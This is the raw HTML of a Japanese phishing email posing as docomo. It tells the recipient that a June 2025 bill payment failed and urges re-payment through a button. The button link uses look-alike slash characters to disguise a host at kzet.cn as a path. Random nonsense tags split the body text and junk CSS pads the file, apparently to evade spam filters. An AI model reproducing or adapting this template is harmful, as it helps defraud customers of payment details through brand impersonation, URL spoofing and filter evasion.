<html lang=ja xmlns="http://www.w3.org/1999/xhtml"><head><title>[PR]メラちチズンム</title><meta content=ja http-equiv=Content-Language><meta content="text/html; charset=utf-8" http-equiv=Content-Type><meta content=text/css http-equiv=Content-Style-Type><style type=text/css><style> body { font-family: 'Meiryo', 'Hiragino Kaku Gothic Pro', sans-serif; line-height: 1.6; color: #333; max-width: 600px; margin: 0 auto; padding: 20px; } .header { color: #d62027; font-size: 18px; font-weight: bold; margin-bottom: 20px; border-bottom: 2px solid #d62027; padding-bottom: 5px; } .payment-notice { background-color: #f8f9fa; padding: 15px; border-radius: 5px; margin: 15px 0; } .payment-methods { background-color: #fff8e6; padding: 15px; border-radius: 5px; margin: 15px 0; } .button { display: inline-block; background-color: #d62027; color: white; padding: 12px 24px; text-decoration: none; border-radius: 4px; margin: 15px 0; font-weight: bold; } .note { font-size: 13px; color: #666; margin: 15px 0; } .contact { margin-top: 20px; padding-top: 15px; border-top: 1px solid #eee; } .footer { font-size: 12px; color: #777; margin-top: 30px; border-top: 1px solid #eee; padding-top: 15px; } </style><style>#lhtjtguhlbc #Jlhatvpg-Fkwcz-Gxqvnmg .Zdqemdkty .spf-eanzwduuf #Fhcp-Uur .czdemdfeapthgieiw #qJkBJvOVVR-PfkwZNY-HaXuE #Hymxiccmk-Pmcihhfcy-Bweo {line-height:normal;box-sizing:content-box;}</style><style>
#Qzquiwnj-Fspsbpfygt-Abjjkxj #gtzlcv-wqji #Xzfwlubh-Irpqg #Lblyyq-Zucbp #GFzwJAHAwYyGPzjTz #Ezuyizxrsz-Ycwzatyu-Uozzmammpf {
resize:none;
border-width:medium;
}
</style></head><body><div class=header>docomo料金のお支払いについて</div><div>いつもdocomoをご利用いただきありがとうございます。<br>このた<ztjnb>び</ztjnb>、<smzcyrfp>【</smzcyrfp>お<szf>客</szf>様番<ggzj>号</ggzj>】<hwpyv>様</hwpyv>の【2<swoulsxc>0</swoulsxc>2<kvjyfe>5</kvjyfe>年0<vlumdorm>6</vlumdorm>月】<qkecm>分</qkecm>の料<qnxnmecp>金</qnxnmecp>の<nllbrf>お</nllbrf>支払<udg>い</udg>が<dzdmmhli>正</dzdmmhli>常に完<bpq>了</bpq>しな<igsw>か</igsw>った<dbd>こ</dbd>とを<ebcrdqyo>お</ebcrdqyo>知ら<ispiff>せ</ispiff>いたし<jmas>ま</jmas>す<oljfyzx>。</oljfyzx></div><div class=payment-notice><div>大変お手数ですが、以下の方法にて再度お支払い手続きをお願いいたします。</div></div><div class=payment-methods><div><strong>お支払い方法</strong></div><ul> <li>docomoアプリまたはMy docomoからクレジットカードでお支払い <li>コンビニエンスストアでのお支払い <li>銀行ATMまたはネットバンキングでのお支払い </li></ul></div><a class=button href="https://axpn.com∕vlhnoxndco∕ycpzvmi∕kbmkgmtg∕fgwbiu∕nsylozlca∕ngara∕uffyi@kzet.cn/">ご利用確認はこちら</a> <div class=note><div>※既にお支払い済みの場合は、本メッセージを無視していただいて結構です。</div></div><div class=contact><div>docomoカスタマーセンター:0120-800-000<br>受付時間:9:00~20:00(年中無休</div></div><div class=footer><div>※本メールは送信専用です。返信いただいてもご回答できませんのでご了承ください。</div><div>ご不便とご心配をおかけしまして誠に申し訳ございませんが、<BR>何とぞご理解賜りたくお願い申しあげます。</div></div><br><br></body></html>